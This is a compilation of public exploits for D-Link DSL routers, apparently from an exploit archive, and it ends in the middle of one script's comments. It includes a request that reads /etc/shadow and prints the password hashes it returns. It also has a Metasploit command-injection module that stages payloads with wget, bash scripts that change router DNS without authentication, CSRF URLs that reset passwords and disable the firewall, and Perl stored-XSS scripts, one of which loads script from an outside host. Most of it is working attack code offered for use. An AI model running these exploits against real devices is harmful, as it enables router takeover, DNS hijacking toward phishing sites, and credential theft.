set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/shadow HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive
HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DSL-2750B OS Command Injection',
'Description' => %q(
This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
Vulnerability can be exploited through "cli" parameter that is directly used to invoke
"ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
),
'Author' =>
[
'p@ql', # vulnerability discovery
'Marcin Bury <marcin[at]threat9.com>' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['PACKETSTORM', 135706],
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
],
'Targets' =>
[
[
'Linux mipsbe Payload',
{
'Arch' => ARCH_MIPSBE,
'Platform' => 'linux'
}
],
[
'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
]
],
'DisclosureDate' => 'Feb 5 2016',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::FLAVOR')
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/ayefeaturesconvert.js'
)
unless res
vprint_error('Connection failed')
return CheckCode::Unknown
end
unless res.code.to_i == 200 && res.body.include?('DSL-2750')
vprint_status('Remote host is not a DSL-2750')
return CheckCode::Safe
end
if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
version = Regexp.last_match[1]
vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
if version >= "1.01" && version <= "1.03"
return Exploit::CheckCode::Appears
end
end
CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error('Connection failed')
return CheckCode::Unknown
end
def execute_command(cmd, _opts)
payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
send_request_cgi(
{
'method' => 'GET',
'uri' => '/login.cgi',
'vars_get' => {
'cli' => "#{payload}$"
},
'encode_params' => false
},
5
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
end
def exploit
print_status("#{peer} Checking target version...")
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end
execute_cmdstager(
flavor: :wget,
linemax: 200
)
end
end
#!/bin/bash
#
# D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
#!/bin/sh
#
# D-Link ADSL ROUTER DSL-2730U IN_1.02
# Remote File Disclosure
#
# Modem Name: DSL-2730U/DSL-2750E
# Time and Date: 2012-05-23 09:51:16
# HardwareVersion: U1
# Firmware Version: IN_1.02/SEA_1.04/SEA_1.07
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
Author : B GOVIND
Exploit Title : DLink DSL-2730U Wireless N 150, Change DNS Configuration bypassing ‘admin’ privilege
Date : 01-03-2017
Vendor Homepage : http://www.dlink.co.in
Firmware Link : ftp://support.dlink.co.in/firmware/DSL-2730U
Affected version : Hardware ver C1, Firmware ver: IN_1.0.0
Email id : govindnair7102@gmail.com
CVE : CVE-2017-6411
Change DNS Configuration Bypassing ‘admin’ Privilege
-------------------------------------------------------
D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate dnscfg.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change primary and secondary DNS IP address to some malicious IP address without using ‘admin’ account.
2. Proof of Concept
Use following URL to modify the DNS entries:
http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=x.x.x.x&dnsSecondary=y.y.y.y&dnsIfcsList=&dnsRefresh=1
Here x.x.x.x and y.y.y.y are the malicious IP address attacker can use.
3. Impact of vulnerability
Information Disclosure: An attacker exploiting this vulnerability can obtain confidential information like users browsing profile. Modifying device DNS settings allows cybercriminals to perform malicious activities like the following:
(a) Redirect user traffic to malicious/fake sites. These sites can be phishing pages that spoofs well-known sites and tricks users into submit sensitive user credentials like banks account username and password.
(b) This can ensure that no more patches are updated from OS vendor sites or firewall sites.
(c) Replace ads on legitimate sites and serve users with unwanted/fake ads.
(d) Pushing malwares.
4. Solution
As per D-Link India this is the only no updated firmware is available for this hardware version which can mitigate this vulnerability which avoids privilege escalation.
All users of this hardware should change default passwords of not just ‘admin’ account but also ‘user’ and ‘support’
Change All Account Password Bypassing ‘admin’ Privilege
----------------------------------------------------------
D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate password.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can change password of all the three accounts without using ‘admin’ account.
2. Proof of Concept
This exploit works only when accounts are using default password.
Use following URL to change ‘admin’ account password from ‘admin’ to
‘admin1’.
http://user:user@192.168.1.1/password.cgi?
inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu
(b) Use following URL to change ‘support’ account password from ‘support’ to
‘support1’.
http://user:user@192.168.1.1/password.cgi?
inUserName=support&inPassword=ZGFyZXN1cHBvcnQx&inOrgPassword=ZGFyZXN1cHBvcnQ=
(c) Use following URL to change ‘user’ account password from ‘user’ to
‘user1’.
http://user:user@192.168.1.1/password.cgi?
inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI=
Here ‘inPassword’ is the new password and ‘inOrgPassword’ is the existing password. Both these password strings are base64 encoded for confidentiality as connection between browser and web server is using http.
3. Impact of vulnerability
Elevation of privilege, Information Disclosure, Denial Of service
(a) Insider/Attacker can change the passwords of all the existing accounts and control the device as required. This will result in attacker having complete control over the device. He can capture traffic of other user and analyse traffic. Attacker can deny services as per his/her choice.
4. Solution
As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
Enable/Disable LAN side Firewall without admin privilege
---------------------------------------------------------
D-Link DSL-2730U wireless router is a very popular SOHO network device used in India. This device has three default accounts ‘admin’, ‘support’ and ‘user’. As per D-Link only “admin" account has unrestricted access to change configuration of device. Account name ‘user’ can just view configuration settings and statistics. Default password of admin, support and user account are admin, support and user respectively.
1. Description of Vulnerability
Cross Site Request Forgery can be used to manipulate lancfg2.cgi in this device. An insider / external attacker (remote management to be enabled for external attacker) can enable/disable LAN side firewall without ‘admin’ privilege using ‘user ‘ account.
2. Proof of Concept
Use following URL to enable LAN side firewall
http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1ð SubnetMask=255.255.255.0&enblLanFirewall=1&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
Use following URL to disable LAN side firewall
http://user:user@192.168.1.1/lancfg2.cgi?ethIpAddress=192.168.1.1ðSubnetMask=255.255.255.0&enblLanFirewall=0&enblIgmpSnp=0&enblIgmpMode=0&dhcpEthStart=192.168.1.2&dhcpEthEnd=192.168.1.254&dhcpLeasedTime=86400&enblDhcpSrv=1&enblLan2=0&enblLanDns=0
3. Impact of vulnerability
By disabling LAN side firewall and by enabling Port Triggering, an attacker can ensure a backdoor access within LAN side as well as from WAN side.
Attacker can run port scanning tools to map services which otherwise wont be possible with firewall enabled.
4. Solution
As per D-Link India this is the only no updated firmware available for this hardware version which can mitigate this vulnerability. All users of this hardware should change default passwords of all the default accounts.
# Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
my $opt = $ARGV[3];
$ip = $1 if($ip=~/(.*)\/$/);
if (@ARGV != 4){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n";
print "\n";
print "Options: 1 - Parameter: wlAuthMode \n";
print " 2 - Parameter: wl_wsc_reg \n ";
print " 3 - Parameter: wl_wsc_mode \n";
print " 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n";
}else{
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing...\n";
my $url_and_payload = "";
if($opt == 1){
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 2){
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 3){
$payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 4){
$payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E";
$url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&".
"wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&".
"wlSsidIdx=0&wlSyncNvram=1";
}else{
print "[-] Chose one option!\n";
exit;
}
my $req = new HTTP::Request("GET",$url_and_payload,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $resposta = $resp->as_string;
print "[+] Checking for properly explored...\n";
my $url = "$ip/wlsecurity.html";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $result = $resp2->as_string;
if($opt == 4){
$payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27";
}
if(index($result, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}
# Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit enable some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
$ip = $1 if($ip=~/(.*)\/$/);
if (@ARGV != 3){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%27;alert(%27XLabsSec%27);\/\/";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing...\n";
my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A";
my $req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $resposta = $resp->as_string;
print "[+] Obtain session key...\n";
my $token = "";
if($resposta =~ /sessionKey=(.*)\';/){
$token = $1;
print "[+] Session key found: $token\n";
}else{
print "[-] Session key not found!\n";
exit;
}
print "[+] Preparing exploit...\n";
my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";
$req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
print "[+] Prepared!\n";
print "[+] Exploiting...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $resultado = $resp2->as_string;
if(index($resultado, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}
# Exploit Title: D-Link DSL-2730B Modem lancfg2get.cgi Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
$ip = $1 if($ip=~/(.*)\/$/);
if (@ARGV != 3){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%27;alert(%27XLabsSec%27);\/\/";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing exploit...\n";
my $url_and_xpl = "$ip/lancfg2get.cgi?brName=$payload";
my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting and Exploiting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $url = "$ip/lancfg2.html";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $resultado = $resp2->as_string;
if(index($resultado, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}
D-Link DSL-2730B AU_2.01
Authentication Bypass DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
This security hole allows an attacker to bypass
authentication and change the DNS. When the
administrator is logged in the web management
interface, an attacker may be able to completely
bypass authentication phase and connect to the
web management interface with administrator's
credentials. This attack can also be performed
by an external attacker who connects to the
router's public IP address, if remote management
is enabled. To change the DNS without logging
into web management interface use the following URL:
http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
#!/bin/bash
#
# D-Link ADSL DSL-2640U IM_1.00
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link ADSL DSL-2640U IM_1.00 "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#
#
# D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
#
# Firmware Version: UK_1.06 Hardware Version: B1
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg/
#
# Description:
# The vulnerability exist in the web interface.
# D-Link's various routers are susceptible to unauthorized DNS change.
# The problem is when entering an invalid / wrong user and password.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#
Proof of Concept:
http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS>
#!/bin/bash
#
# D-Link ADSL DSL-2640B GE_1.07
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link ADSL DSL-2640B GE_1.07 "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Tested firmware version: EU_2.03
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES OR FIRMWARE VERSIONS MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
